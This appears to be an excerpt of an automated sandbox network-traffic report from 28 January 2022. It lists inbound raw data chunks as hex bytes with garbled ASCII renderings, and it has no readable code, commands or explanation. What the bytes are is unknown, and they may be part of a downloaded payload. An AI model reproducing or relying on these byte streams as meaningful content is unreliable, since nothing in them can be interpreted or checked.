                                                                                              2022-01-28 18:02:09 UTC61INData Raw: c9 40 d2 aa f7 80 7f ca 83 c4 bb 1c 03 05 03 38 39 88 62 bb 67 0f d9 a9 53 58 dc 45 6a b7 62 b0 c3 3a 23 dd fb be a5 58 ed ef 90 22 5e 9d 8b a3 a3 ad 4b 7a 4a c9 32 31 86 65 0f d7 d2 91 8b 9a 09 11 d5 29 a5 62 b5 46 d0 9c 05 37 84 42 e6 49 7d c9 0e a1 93 86 64 b8 d5 2f 8a 68 83 f1 9a 3a 1b cd 04 b9 5e ae fb 85 dc 72 62 bb 50 c4 8d 98 01 0c ae c0 9d b1 48 f8 37 8a 63 3d 9a 07 06 89 d8 5c 9a 36 08 a2 17 ca 89 e9 e9 dc 78 76 5f 30 04 81 c6 b2 f5 b7 69 0a a8 d5 2d ef 97 80 79 cf 0e aa f7 b7 56 d9 d8 67 44 ec 51 42 d1 14 52 f0 25 d8 51 41 59 28 19 f4 2d a4 e7 cb 34 0b 2c 22 55 16 49 42 e4 78 40 df cc 82 4a fd 82 7b c5 35 85 ef ac fd 84 4c ff 88 69 03 09 1f fe 09 27 94 3c 56 d5 2d ef a4 ea 5c a3 94 03 3d 99 b0 f3 ec 58 ed d3 2a 12 68 b5 46 ec 52 c9 0e ac c8 b7
                                                                                              Data Ascii: @89bgSXEjb:#X"^KzJ21e)bF7BI}d/h:^rbPH7c=\6xv_0i-yVgDQBR%QAY(-4,"UIBx@J{5Li'<V-\=X*hFR
                                                                                              2022-01-28 18:02:09 UTC63INData Raw: b9 5f 38 34 00 80 77 df cb 09 1e 78 74 64 81 f4 1c 45 52 fd b4 c7 04 b7 62 82 7c 7c 41 59 2e 30 05 3e 1b c0 ab 78 4f 48 fd b9 5a ae f8 3b 99 b1 4c c1 21 e3 f3 a8 ea 65 01 08 94 05 35 b9 5c a4 ef 9d 86 57 5b 21 dd f0 26 51 40 ed e3 fd 85 e3 f7 8d 92 0d 17 fb 8f a8 d6 66 80 44 e1 fc 07 36 34 30 39 bc d4 a1 93 80 7f cc 81 c1 1f cb 36 01 3f 97 b0 c6 83 cf 32 02 b3 07 38 0b 25 e7 cc bd 26 5c ac f4 1e 48 b4 cc 83 c2 9a 06 b6 f1 a6 e4 73 ee 64 b4 f1 af 7f c9 06 8d 97 8a 6a 82 4c bf 1b f4 2e 0f d2 a8 de 7c 7a 72 64 8d 9b 89 dd cd 04 8e 2a 24 58 dd c3 3b 99 89 e9 d3 2e 06 8f eb da 5e ed db e5 c1 20 44 d1 2b ab 46 dc 31 bb 6f 17 c7 0e 9d bd 2a 24 50 ce 83 ff b6 c5 00 b3 71 20 7f f1 aa f1 a9 6a cc 84 48 b4 f8 04 81 f1 9c 04 86 5c a0 57 1b c7 30 0c a8 ed e6 47 49 7c
                                                                                              Data Ascii: _84wxtdERb||AY.0>xOHZ;L!e5\W[!&Q@fD64096?28%&\HsdjL.|zrd*$X;.^ D+F1o*$Pq jH\W0GI|
                                                                                              2022-01-28 18:02:09 UTC64INData Raw: 11 e6 49 7c 45 63 33 81 ca 8e 2b a8 e1 ca 8d 98 08 a3 ae ff 8a 6e a8 dd f7 8b 9c 31 b2 c9 0e a0 1e 4b 7c 7e 72 63 38 07 01 33 80 7a 76 59 14 54 e7 f3 a6 ea 5b 26 60 b5 4f 46 e4 47 76 50 fb b0 ce bf 2d 92 39 bb 67 0a 9c 0a a1 99 b6 c8 bc d5 2f b2 fe 0b 25 e4 77 ad 4d 41 5f 0d 1c 76 6c 90 2a 26 6c 91 f0 22 58 d0 a6 e7 f0 1a 7f c0 9f 99 be ac ce 85 d3 11 e1 f8 08 9a 33 b0 c6 f8 04 b3 46 d2 a7 56 ed d7 e4 42 e1 cf 32 3f 9c 32 32 34 03 00 bb 5f 00 b1 48 f8 0c 9b be 90 2a 67 09 21 90 28 29 ac fe 02 ba e7 cc bd 12 2a 25 e9 dc 41 57 59 12 61 36 0e 98 0c a9 53 5b 13 e4 73 dd c2 9d 82 4b 72 64 fc 0f e5 88 6b 33 b9 61 0e 97 80 4c f7 f6 74 60 b9 6c a3 98 39 82 71 15 ca c3 0c 93 b7 66 85 ea 65 38 08 9b b9 5f 38 34 00 80 77 df cb 09 1e 78 74 64 81 f4 1c 45 52 fd b4 c7
                                                                                              Data Ascii: I|Ec3+n1K|~rc83zvYT[&`OFGvP-9g/%wMA_vl*&l"X3FVB2?224_H*g!()*%AWYa6S[sKrdk3aLt`l9qfe8_84wxtdER
                                                                                              2022-01-28 18:02:09 UTC65INData Raw: b6 67 62 56 56 b1 6d 21 a3 6a 26 63 c4 21 ec aa dc 1d 25 3b ae fc 01 da 2e 8b bf dd 4d 37 6d d3 1d 33 69 67 0c f8 d4 43 5c 4c 3f f1 40 65 46 64 47 aa f9 d7 85 4c f2 71 a3 a3 9f 67 65 8d ce 6a 48 99 25 0a 96 d7 79 98 ac 63 3f 7b 33 b7 ab 1e e5 71 7b 95 90 f5 88 33 e2 c1 20 3f cc 4a fd d8 77 85 a2 36 66 a5 e8 66 dc 34 6b 74 4b 57 1f a7 0d 3a c0 47 60 9d 83 b6 32 fd 8a ab 6e 60 fb a4 d4 f6 2b ea 21 22 4e b2 3c 5c cb fc 12 1b 3a 0c e9 de a6 97 60 33 80 b2 1a 42 04 4d 78 cc 76 80 92 5c 17 b5 2d 73 8f 5d 26 fa 9f 6d c9 65 d1 92 20 d3 f8 bb 28 d6 ba de 08 fe 89 df 51 f1 ae f9 43 7b 84 ec 73 08 91 0b 72 d3 58 36 cf 74 70 3b ff 44 13 8d 6f d9 37 c2 04 b4 5f a3 14 8a 52 59 6c 45 68 db a0 a6 5a 91 d1 9a e0 4d a0 24 37 0f 6b 88 b2 cb e3 1c 3e f1 ab 95 84 3a bb e3 37
                                                                                              Data Ascii: gbVVm!j&c!%;.M7m3igC\L?@eFdGLqgejH%yc?{3q{3 ?Jw6ff4ktKW:G`2n`+!"N<\:`3BMxv\-s]&me (QC{srX6tp;Do7_RYlEhZM$7k>:7
                                                                                              2022-01-28 18:02:09 UTC67INData Raw: cb 55 a5 3f 93 b0 f3 6b 65 48 4d 50 37 d1 2d ab 4d 3a 6f 65 41 75 19 af 7b ce 85 5e b6 d5 f2 3e e4 5a ab 7e 4c 63 86 e9 0f fb 79 d9 d1 12 56 50 d4 8c d3 07 f0 08 d0 9f 91 19 9a 69 ba 91 4e df cb 0c a5 98 f9 57 8b bd cc c0 a0 10 64 d9 87 bd 5a b2 21 c8 8f a9 5d 71 e1 14 d7 af 82 5c a0 1d ca e3 b6 b9 33 ee a4 fa 3b a7 64 62 c3 50 67 10 8e 6a 80 49 43 83 17 30 4b 33 4e d1 25 d4 9e da 24 49 3a 00 44 f8 03 0b 2d 0c a1 aa ed d2 68 8c 22 5f 0c 13 55 f4 f5 f7 55 55 62 89 d6 72 48 af b0 89 3b d3 12 5e aa 08 3e b7 57 15 0d 1f cc 86 14 1f a3 eb a1 d7 0c 91 80 75 e6 bd de 8a 3f d2 7f f1 9f 99 84 f3 0e 2b 23 cc 6b 0d 14 65 3f 24 2c 52 00 aa 0a 9b b0 c9 34 a4 91 c7 e5 8f 53 38 32 02 bf 79 6e 08 d5 0d f6 5d 2a 29 a1 ad f0 ac d6 26 ad 18 4f 75 d4 dc 9e ea dc 64 57 25 d1
                                                                                              Data Ascii: U?keHMP7-M:oeAu{^>Z~LcyVPiNWdZ!]q\3;dbPgjIC0K3N%$I:D-h"_UUUbrH;^>Wu?+#ke?$,R4S82yn]*)&OudW%
                                                                                              2022-01-28 18:02:09 UTC68INData Raw: 7c ad 35 69 46 d8 65 3e 47 eb 5c ea 13 0a c5 3c 13 e9 e5 4a 66 de 6b f1 b2 f5 b3 79 8a 55 6f 1c 54 34 43 5c 96 39 30 33 8a 49 6e 7d bf 24 18 70 c0 3a 98 15 bc 25 e2 76 65 0e 69 ab da 69 1d 22 50 fe 0a a3 90 09 45 a7 7c 84 4e c7 0a 99 f9 da 0c f5 ff 7a 4f 06 8c 16 7b a1 c6 26 47 92 3b a5 68 8f 53 e9 67 33 f1 54 d3 1f cc 8f 2b 06 30 e0 3d 64 be 9e 1a 42 44 41 c5 af 6f f5 85 dc 4d 01 8b d1 6d c9 0f 04 ea 56 e4 71 21 fe 5c 2e 7b 12 01 09 27 94 25 f7 ef 1d d0 7d 8b 97 b6 fa 4b 3f de 80 5d d6 16 72 62 b6 61 02 b7 4c e7 2c 5e ac f4 26 ef eb c0 51 02 7f bf 25 9a 3a f3 06 3a 15 b9 b4 b3 4f 46 e5 6c e1 8a 97 9c e0 06 81 c9 3d 8f 75 21 3b d5 e5 6a 80 4f 4b 3d c2 b1 c3 26 be 1e 4a c6 89 20 a4 17 9c 44 0e 3c 2f b9 5d c2 51 a7 1c 53 bc 65 09 16 48 10 e8 dc 63 70 62 7b
                                                                                              Data Ascii: |5iFe>G\<JfkyUoT4C\903In}$p:%veii"PE|NzO{&G;hSg3T+0=dBDAoMmVq!\.{'%}K?]rbaL,^&Q%::OFl=u!;jOK=&J D</]QSeHcpb{
                                                                                              2022-01-28 18:02:09 UTC69INData Raw: 71 5a 57 47 9f a6 e3 c4 b2 23 fb 2f 9d 9e f5 b5 73 e1 cd 0e a9 17 f5 fa c1 29 a1 93 b9 af 60 37 5c f8 c2 ee 55 62 ba 9e 28 68 0a 81 2c 49 48 f9 8f bb 72 18 1e 07 fd fc 38 05 0a eb 4f 9b 97 90 d1 62 82 42 d0 64 b2 e5 dc 7e 80 34 0f ee 63 de fd 2d 6f 5f d3 7a 42 db e4 b6 54 d7 0a dc 96 41 61 01 39 34 45 85 a2 52 32 5b 21 de 36 ad 4d 01 17 b9 bf 56 e3 f2 27 68 82 b6 bc 90 c6 19 cf 02 80 6e 93 37 4a e3 20 f7 b0 ca 83 ac 0a 03 81 d6 9b 30 01 37 bd 42 80 d7 b3 00 43 dc 44 d4 a2 1a 99 2a e0 69 e2 8c 2f ba dd 34 62 fc f3 eb 27 6d 2e 01 02 a5 13 20 05 1d 2d 74 59 21 ef 71 3b a9 a6 ad 85 1f f1 ab 4d 64 4d d2 7b ea bd e9 da 58 d6 0c 17 b9 c2 e8 bb 9b bc ee 6f 9f da 1c 31 a3 67 d9 e0 78 72 52 b0 a3 1a 6a 6c f7 bf 18 44 55 53 be d1 53 b7 c1 2b ab 7f 3c 2d f9 fd cb e5
                                                                                              Data Ascii: qZWG#/s)`7\Ub(h,IHr8ObBd~4c-o_zBTAa94ER2[!6MV'hn7J 07BCD*i/4b'm. -tY!q;MdM{Xo1gxrRjlDUSS+<-
                                                                                              2022-01-28 18:02:09 UTC71INData Raw: fa 75 39 ce 98 fc 6d 1c 72 6c c4 ab 9b da 22 a2 63 06 8c 16 14 76 45 d1 0f 02 f4 16 7f ca 48 1f b9 6d 5b d6 d5 15 f6 33 86 4d 73 2f f2 d5 a1 ac fe 34 6b 61 7d 32 2e de d6 60 8e 68 39 87 39 e3 cc 6e 27 a7 55 62 43 74 bf 81 8e c2 60 81 f3 98 d1 44 ee 8e 3e f4 f4 15 c7 0e 17 3f ba c3 28 de a4 eb d5 1e 06 e7 3c 23 cd eb 18 74 67 0d 1a 5f 7d 00 f5 4f 9e 16 34 3c 74 8b 2a ec 12 89 08 94 38 01 13 9c bc f1 bb b0 18 7f cc b5 83 ba 54 19 ba 23 b9 57 50 c4 db ed 54 27 b7 b1 ce 83 f0 15 65 fc f4 21 98 e6 d6 54 de 7c d1 af 95 87 c6 55 da 56 dd cf bc 01 44 df b3 be 26 6e a8 e9 41 1d 5c 81 dd 0e 01 07 08 9c 8e 60 fa c2 e9 3f 05 34 0f de cd 9f fd b1 56 30 a7 5e a4 d2 e5 11 fa b6 9f 79 7f f8 39 b8 3b 10 27 5f 7c 8b 0a 92 0e 92 9f f3 5b ea 49 89 7c 7a 7e 49 93 dc 4d ce c7
                                                                                              Data Ascii: u9mrl"cvEHm[3Ms/4ka}2.`h99n'UbCt`D>?(<#tg_}O4<t*8T#WPT'e!T|UVD&nA\`?4V0^y9;'_|[I|z~IM
                                                                                              2022-01-28 18:02:09 UTC72INData Raw: 71 25 dd f3 c0 a7 92 86 3b 7a fb f6 d4 43 09 ea 5c 88 1b b7 8b 98 36 0e a4 a1 b5 54 b7 95 8c 24 67 06 b0 b1 76 93 1d ac 01 a9 0d e6 7a 2d ba b1 85 d8 6a 8c 12 2a 71 54 bc 10 64 b1 40 d1 23 b1 41 8a f7 d6 8b 39 f2 c2 a9 46 fe 6b c8 88 67 0d 2e 72 47 69 70 57 53 52 f3 92 0e f6 3e ff 2e 44 0b 8b dc 9a 06 aa eb b2 18 7c 44 ee 6d 27 80 08 e7 15 c3 3c 15 cf 08 f6 32 db 48 89 25 11 81 2d 90 31 f0 47 b7 53 5f 3a 16 47 51 14 0f 33 f7 f6 32 00 b8 af 76 ab c5 5c a8 d7 d9 e8 ad dd 85 b5 a0 79 f3 ec 5c 41 c3 4c 4f 5c 5c 2c 4f b4 6f 7d 95 e9 27 d5 7f ae fd b7 7b ee 30 d5 5d 74 5a c1 e6 5a a3 ab 79 f2 c4 63 ce ff 5c ea 6b 00 bc de c0 b3 a6 f1 8e 28 47 b7 13 df cd 0e df 12 f6 da 07 d2 de 7d f7 8a 60 90 3a 6c 33 a6 17 b0 93 8e 53 91 ff 8f a3 99 8b d4 cd 8e c1 4d e4 03 f4
                                                                                              Data Ascii: q%;zC\6T$gvz-j*qTd@#A9Fkg.rGipWSR>.D|Dm'<2H%-1GS_:GQ32v\y\ALO\\,Oo}'{0]tZZyc\k(G}`:l3SM
                                                                                              2022-01-28 18:02:09 UTC73INData Raw: b4 71 f5 ce 65 b7 52 79 63 58 21 62 b9 73 d7 97 5d 12 58 ee 6a ba 3b 28 77 8e 09 26 22 70 89 b7 8d 9a 0a 9c 33 b3 ac 76 90 49 20 57 24 e1 ce 79 71 1b 03 02 b4 ce b0 fd 7d 76 9e 72 44 fc 6f aa cf e4 c7 0d 32 3b e5 04 87 d2 a5 57 60 15 49 84 2e 8f 05 6e 75 4d 4d a8 4e c4 93 84 35 58 d7 e8 6d 1e 7d 04 0e bc b4 3a b7 51 60 b0 ab b1 7f fe 0b 25 e4 b3 f0 7b 95 e4 09 71 48 ec 30 80 00 4c 58 dd 27 94 35 b0 c1 16 8e 8d 8a 25 f4 69 68 29 ec bc 75 e6 6e a4 92 f5 84 4a ba e4 70 2b 33 e4 29 5e 84 3e a1 16 41 5c 78 1a 8a d7 e4 27 4b 9d 8d e6 42 0b 1e 1e 4a 97 46 d4 ac f8 0b 58 3c bd 02 e1 26 59 1e 49 41 56 8c 1a 02 6b 18 2f b1 31 66 ba de 71 10 56 23 59 cf 6a 48 f5 80 77 e3 c2 13 d3 ef 29 a6 b2 f0 52 15 f8 05 00 bb 54 3f 0a 7d 96 e2 40 d2 92 08 9c a2 14 96 ab 46 36 3b
                                                                                              Data Ascii: qeRycX!bs]Xj;(w&"p3vI W$yq}vrDo2;W`I.nuMMN5Xm}:Q`%{qH0LX'5%ih)unJp+3)^>A\x'KBJFX<&YIAVk/1fqV#YjHw)RT?}@F6;
                                                                                              2022-01-28 18:02:09 UTC75INData Raw: be ad f4 53 64 ca 1b c6 8c c9 e6 81 b6 ff 8f 25 46 e9 18 e7 f1 9a fc 2d 63 50 f6 3d 71 02 e4 f9 9e f5 37 ee b6 25 e4 46 dd c7 f7 66 2c 40 43 0d d0 0b a1 a6 49 17 13 46 42 d5 dd 5b 87 d8 1e ed a1 4c 77 56 dc ca ee ac 52 7d 9b 4b dc dc 74 1f 7a 0c 43 f9 0b 6b be ca 72 c7 88 30 e5 7d 4d 3c 76 c9 65 e3 46 40 93 19 93 45 cc 25 bc 13 42 57 3b f3 05 70 59 b2 7b 90 90 5c 59 8d 09 6c 41 d3 a0 79 9d 24 20 99 06 38 7a d4 f9 5f 9b 3a 7d 01 12 0f 02 bc b9 ef 4a 4d 02 47 ef 95 14 a3 7e 1f 73 18 02 30 e4 36 b8 60 6f 91 12 5e 00 11 c2 c7 33 b9 59 d3 39 38 3d 90 18 47 b0 11 eb b2 64 d7 3d 12 60 80 f8 4d 88 84 0d b9 17 e1 9e 66 86 3b 78 e3 f3 a8 e3 a2 e8 35 46 3c c2 2a 2d 17 dd 0a 02 ed 6b 23 2a f2 34 ea 8b f1 58 11 fc e5 1a 67 ea 8a 46 6e fe e8 bd e0 8f a6 d9 88 af bf 62
                                                                                              Data Ascii: Sd%F-cP=q7%Ff,@CIFB[LwVR}KtzCkr0}M<veF@E%BW;pY{\YlAy$ 8z_:}JMG~s06`o^3Y98=Gd=`Mf;x5F<*-k#*4XgFnb
                                                                                              2022-01-28 18:02:09 UTC76INData Raw: a1 71 37 9f e2 43 5a 04 db 1c bb c4 b6 c2 aa 9c 8d 3c 01 ee 7f 0c a1 61 fb d3 e2 90 0b f8 f3 87 40 01 e5 e0 e3 8d 41 cb 0c da 69 a5 60 47 82 fc 33 88 66 77 1c e0 4d 49 75 06 55 96 a5 98 d9 0b 0d d4 76 c6 10 ab 71 e2 92 cb e7 0d f4 c7 eb 2c 31 77 bd bf fc d3 d4 1b 91 6e 8b 7b c7 c6 6f 5d c9 d9 e2 c7 d4 42 e1 22 5c aa 84 4f 45 65 74 c2 a2 29 4a b0 1c a9 3f 3d e5 58 58 37 bd ab 66 79 12 fb bd 15 c1 a4 78 46 32 b4 f5 83 ad 5d 50 26 bd a6 d2 9e 24 22 5d ea 93 86 59 c5 ed 9f f6 d2 43 6b fa d1 40 1b fa 36 3e 1f 5d 18 39 fa d5 8d b0 4a 6a b8 b3 d6 5f 70 09 22 6e 1c 49 4c 09 f7 7b a9 96 35 8c 50 5e c1 d4 53 2a cf dd f7 26 3e e2 83 ac 81 b5 46 42 74 64 8d 22 66 72 b3 b3 29 26 67 01 b7 53 50 2f 36 6e 74 73 22 c8 df 70 7f 27 41 08 ae f1 c0 a1 d5 9f a5 5d d0 8a 24 ab
                                                                                              Data Ascii: q7CZ<a@Ai`G3fwMIuUvq,1wn{o]B"\OEet)J?=XX7fyxF2]P&$"]YCk@6>]9Jj_p"nIL{5P^S*&>FBtd"fr)&gSP/6nts"p'A]$
                                                                                              2022-01-28 18:02:09 UTC77INData Raw: 03 fb 9d e7 c5 dd 18 18 7f f9 3b 0d 83 59 6e d6 53 5c 4e 73 50 43 f3 53 dd 04 b2 30 ec 3e 9d 7f 91 a5 15 f0 26 a5 5c 1b b5 bc c0 ca ff 8d a0 26 f8 4d 54 3a 6c ff be a5 5f 00 84 7a cc aa 79 71 4e 3f 7f 7d 92 3d 90 5f 47 65 d5 6e ed d7 e8 65 3e 2f 80 78 00 ba e8 60 5e 4f 30 4b 76 50 91 b0 f5 82 0a 7b b1 25 20 b6 a0 74 6d 17 7f 4c ee 56 0f f8 78 b3 1d 64 95 21 50 2e 08 1c b6 6c f1 2c ef dd 94 78 e5 f8 3f 75 e0 3b 16 05 91 8b 27 a6 73 d7 4b c2 95 fa c5 d2 2d d0 95 81 a5 e2 7b 48 22 5a ab e6 4a 73 8a aa 05 b0 a4 d1 11 96 aa fb 1a 76 54 e0 85 c0 18 22 62 82 7c 7c e7 57 4a 00 60 75 a1 5f 31 6d 8c 46 6b eb ee 82 0a 4f 4e f0 2a b1 ac 4f 37 63 31 c9 f3 41 66 bf 1b 0c 93 b9 5c 97 89 b9 bb bf 2b a9 6c 07 06 87 e8 6e 75 14 30 0d 2e 0f 7c 76 17 ee ae da 6f 26 51 4e f8
                                                                                              Data Ascii: ;YnS\NsPCS0>&\&MT:l_zyqN?}=_Gene>/x`^O0KvP{% tmLVxd!P.l,x?u;'sK-{H"ZJsvT"b||WJ`u_1mFkON*O7c1Af\+lnu0.|vo&QN
                                                                                              2022-01-28 18:02:09 UTC79INData Raw: f7 5f e7 ff 1c b4 3c 11 ea 54 df c7 dd 6a 8b 95 07 16 ff fb b2 c4 8e 4b 9b 63 0e 9c 04 85 4e 43 87 33 bc d6 66 83 f7 18 f6 05 02 6f ba a7 fe 3c 96 54 24 b9 51 7a 70 97 f9 3e 29 88 c8 bc ea d4 dc e7 b5 a5 95 b3 42 d4 90 58 5e ed 23 4f 7b f2 d9 1f c9 37 bb 68 04 bf 05 88 6b 02 a5 f4 1d fb 86 d6 15 6d 7a e5 2a d3 d6 53 5b 19 cd 34 fa eb ec 51 31 e6 04 61 2b 62 32 c7 c5 0d 1f c7 0f 98 32 d6 e6 75 db 1a 89 0d 24 6d 17 f6 c7 72 18 0c ad a7 e2 4c c0 2e 02 70 02 8b 30 cc 68 b1 71 2b 95 cb 3f d8 e3 c8 b4 5f 3d 03 73 07 e1 fe 0f df f0 42 7d 13 18 a5 19 ca 87 23 8c f4 46 e3 cd 3d a6 d5 1f cf ec 4d ff 69 27 01 9f 6c 6a 82 0a a9 5d b8 38 e9 e8 52 f0 2c 5c 20 7d ff 0b 23 e7 3a f9 a1 fc 3e 11 1c 02 ea 47 a6 3a 61 06 8c 23 df c9 06 16 f0 88 79 65 ca 8b 26 19 62 07 5a 2f
                                                                                              Data Ascii: _<TjKcNC3fo<T$Qzp>)BX^#O{7hkmz*S[4Q1a+b22u$mrL.p0hq+?_=sB}#F=Mi'lj]8R,\ }#:>G:a#ye&bZ/
                                                                                              2022-01-28 18:02:09 UTC80INData Raw: e2 4b 74 88 4e bd b0 f0 c8 49 e1 c8 bf 15 69 eb 28 27 93 85 d4 e3 f2 40 63 04 b8 43 5d d9 1e d0 a6 eb 97 e4 a1 75 eb d7 e3 cb 87 dd b3 c5 05 00 1e 68 e6 b8 3d 11 ea 56 e8 2f 5b ca b9 6d 1c 76 fa 31 57 d9 ee 6f 29 01 35 e8 62 aa 03 89 e0 77 d1 a6 db e7 cf f1 40 7f 82 42 e1 19 07 9b 8d a6 e4 46 ba 43 28 2e d9 24 21 46 d2 f0 d7 04 81 f7 87 d8 15 f8 11 78 43 6e 1f f0 cc 05 e3 59 c6 55 5c a0 17 fa 47 45 97 07 0b 1a 90 ef d5 ed cb d4 ff 69 f4 17 ce b8 d7 77 e8 35 06 86 5a 44 0c 42 ed e2 4e c0 47 62 d6 1c 45 19 72 20 7a fc d7 1c af 75 e0 7f fc 9e 13 9f a7 81 4f 78 42 45 72 00 50 28 ec 6c ad 75 6f f5 4b bc eb df fb 61 cb df c5 32 02 75 14 a6 d0 ad 46 16 99 b8 d9 eb d4 ed 5a a3 1b c7 a2 12 ea 54 58 e0 ec 58 2e db dd f8 05 0f 93 5e 55 58 ea 5c 9b 08 02 c1 bc 8f 46
                                                                                              Data Ascii: KtNIi('@cC]uh=V/[mv1Wo)5bw@BFC(.$!FxCnYU\GEiw5ZDBNGbEr zuOxBErP(luoKa2uFZTXX.^UX\F
                                                                                              2022-01-28 18:02:09 UTC81INData Raw: c9 36 9e 27 c1 28 2a a2 2a d3 d0 95 8c bf 10 ef dd 00 5a 3a 19 ff bb 22 d2 90 4c 3b 94 0e 6e 82 9e 8d ae 0c 5e 8d d8 9c e0 e7 f5 ba e5 49 74 8c 4f 4e c6 38 0c 61 f8 02 f6 df 0a 07 06 8b a3 f0 2f 4f 27 ad 75 1e b2 5d 10 51 78 fa b7 59 c6 84 4f 74 e2 75 18 a2 07 62 5f d4 14 5e 92 31 c8 8e b2 b8 dc 4e 2d 5e 32 39 87 e5 4a 6c a3 2d ae f8 3b 65 cf 83 f3 92 0d 98 05 68 89 e3 ba e2 34 d0 9e 12 fc 0f 7a 79 0a 6d 8b 94 0b 24 3f 0b 2a 7f 16 77 d0 77 f3 78 e9 d0 70 09 3f 02 69 f5 26 67 0d 2b c5 00 0d 68 b2 c5 b7 55 b3 98 f7 c3 ca 78 f5 88 68 b7 c9 38 68 eb d7 d1 fa d3 84 49 45 52 ad f6 07 bd 24 5a 9d 05 09 f7 75 a7 07 e3 20 dc 74 6a 89 56 d1 13 8a 55 50 3e ea d8 61 0b 58 ad e7 ff e3 f9 b8 e6 b2 26 c4 8a 53 56 40 df 95 b9 67 7d cf 5b e6 4b 48 74 63 cd fb 09 27 a5 6f
                                                                                              Data Ascii: 6'(**Z:"L;n^ItON8a/O'u]QxYOtub_^1N-^29Jl-;eh4zym$?*wwxp?i&g+hUxh8hIER$Zu tjVUP>aX&SV@g}[KHtc'o
                                                                                              2022-01-28 18:02:09 UTC83INData Raw: 7b b8 49 e5 bd b5 b9 be b3 2e 09 18 16 44 a4 04 a2 a7 f4 d6 ac fe e9 be 2b df 9c e0 19 93 44 3a 7f c9 1d 32 e5 af 84 8f 90 5b c0 5b 52 a7 56 e9 24 b0 84 2c 17 cc 0a 1e 34 03 e8 51 4e bb 5c b3 a2 3d 38 74 87 09 1d 36 dd c5 d8 13 18 f1 7c e3 ae 9f 97 cd fb de d4 f4 c5 ea 58 3f f4 cf 73 68 f7 bd 3f 76 a8 dd 3d d3 a0 63 ca f4 c1 54 b4 bd 1f d2 71 c3 36 e0 16 8d c7 41 1e 79 ef 57 75 69 70 95 b3 c0 3d 7c 70 15 ef 8e 25 fe 9f 46 5c 40 7e 30 9c e6 db 15 c4 76 50 a3 98 03 32 b1 b7 d3 7e c2 f8 f3 5f 43 0d 1f fd e9 22 0f d9 e1 fc 86 db 72 1c 4b 48 fa 4a 0d e4 7e 7b c6 f8 4b f3 4c 11 d8 66 b0 fe 33 a9 af 76 63 dc db 8b 42 bd 9f 75 e4 70 11 eb 78 ae c9 0d 63 6b 7a 9e e4 46 e4 79 cf 85 4a f1 0d c0 9f 9a f1 5e a7 5a af 79 88 19 92 fc 3f 97 dd 7d cb 3b a2 ef 8b 94 d3 1e
                                                                                              Data Ascii: {I.D+D:2[[RV$,4QN\=8t6|X?sh?v=cTq6AyWuip=|p%F\@~0vP2~_C"rKHJ~{KLf3vcBupxckzFyJ^Zy?};
                                                                                              2022-01-28 18:02:09 UTC84INData Raw: 6f e7 eb 7b 6a 0d c8 5d fe 2d 34 7d ca 2a f4 1b f7 54 31 55 3c 14 5d a6 b3 e5 f7 ea e7 d2 15 79 17 25 dd 1b 16 48 10 a6 e8 c9 f6 ee 29 c7 cf be 90 66 40 cb d4 90 20 71 2f d6 23 d1 18 90 30 4a 3d 8e 98 61 b9 a3 5f 3b f4 d7 61 6f 9b 06 1d 46 64 35 00 30 be 30 06 c8 59 76 f0 5f 3a 25 47 f9 31 5b 2c ab 39 28 39 7d b3 a9 7c f0 df f3 5a 67 7a 91 7d e8 3b a6 e1 13 ca 2e 42 09 4a 62 cb 0b 2c 2d 1e 3c 66 b8 81 f8 05 0f 13 f8 56 52 d7 b4 fc c6 c1 31 fa 15 a3 8b 38 0a 8a d0 61 0b ca b8 21 90 13 ef 45 ae 90 c2 74 0a 18 cf 1c c1 bb 56 ec 5b 11 15 1b 4c f7 87 e6 fe 15 77 92 d3 80 14 86 96 7c 30 e8 79 85 e1 cb 07 f5 3b ce 6f 97 a0 e8 c8 9d 73 6c cd fe 9c 51 db 07 fd 00 8d ad 70 9c 96 e0 71 28 db 49 1e a6 3b d6 03 e3 41 43 f6 a8 d5 7e 44 e1 05 c4 c9 79 78 7c 96 51 7d fa
                                                                                              Data Ascii: o{j]-4}*T1U<]y%H)f@ q/#0J=a_;aoFd500Yv_:%G1[,9(9}|Zgz};.BJb,-<fVR18a!EtV[Lw|0y;oslQpq(I;AC~Dyx|Q}
                                                                                              2022-01-28 18:02:09 UTC85INData Raw: 97 6c b8 ed d0 af e3 f0 46 f5 5c fa 7e 4a f9 86 51 06 43 65 31 54 c6 d8 fd cf 6a 8f a9 5a 6b 8e 13 d2 7e 2b 9c 63 c8 45 41 63 37 8d ca c3 52 f7 bd 23 37 1b 2a b8 e2 6b bb 61 3f 10 75 8c 2a 21 22 bd 74 60 b0 c9 62 57 93 49 1b c7 4a 25 ef a2 e5 58 24 c3 71 54 1a 7f f3 48 30 58 35 57 b6 be 21 c1 2a 25 ec 26 5e 0c 49 7f c0 48 ee ed 2a 14 fc 12 e3 36 0f 27 95 c0 9b b5 78 f7 3e a1 d8 ee 2c 2a 26 63 d2 71 19 fd b9 53 cc f0 c7 c1 16 77 de 45 51 86 9e 51 0c 06 ea 5d 21 da 97 78 7c 4a ce bd ae 9d 68 61 0c 99 b4 c6 83 77 21 db dd f6 be 00 b2 f3 c0 37 82 ec eb dc 75 1d b8 6d 89 28 d3 19 bc e3 c4 c1 1b 06 59 12 6c 7a 8e 16 4b 40 eb b9 64 24 8e 14 66 f2 db 19 bc ea 5d 2e d5 d7 e8 d4 7b 15 c2 9f a5 52 b0 f5 7d 27 9f a9 9f 06 e4 a8 a2 c6 51 ab 4a cc be 91 c5 bf 91 33 84
                                                                                              Data Ascii: lF\~JQCe1TjZk~+cEAc7R#7*ka?u*!"t`bWIJ%X$qTH0X5W!*%&^IH*6'x>,*&cqSwEQQ]!x|Jhaw!7um(YlzK@d$f].{R}'QJ3
                                                                                              2022-01-28 18:02:09 UTC87INData Raw: 0e b9 37 a6 81 e5 ba 55 75 75 27 7b 07 34 3a 93 41 53 42 71 98 e7 d4 60 30 d5 0c 00 a4 62 b5 7d bd 32 b2 b9 f2 ce 58 5e f9 c5 88 a8 34 bc 5a 15 5e 60 0c cc 02 cb bc 1b 55 af 21 04 ff e4 aa 2f a1 9e c1 2e 27 a1 bb 23 23 56 8a e9 ce 48 50 1f 30 50 c6 c4 9a 32 61 2f 75 95 8b fd 95 79 a4 24 0e 9d 1d 8a 99 3a 0e ee 78 dd a2 8b 01 76 04 38 7e 6f 1f 07 17 00 c1 72 c2 d9 51 b4 c8 ef 21 64 56 99 37 dd f8 ee 75 da 54 55 7a 75 cc 11 dc ae b2 f6 c0 2b 7c 7b 4e 98 ae 7a a6 cb 60 9f 61 c4 39 07 e8 06 b7 94 e1 97 38 2a 85 0a d0 24 a4 23 f6 30 b9 48 e7 c9 1a 92 b9 98 1c e5 4f 9b 9d 98 58 f3 69 74 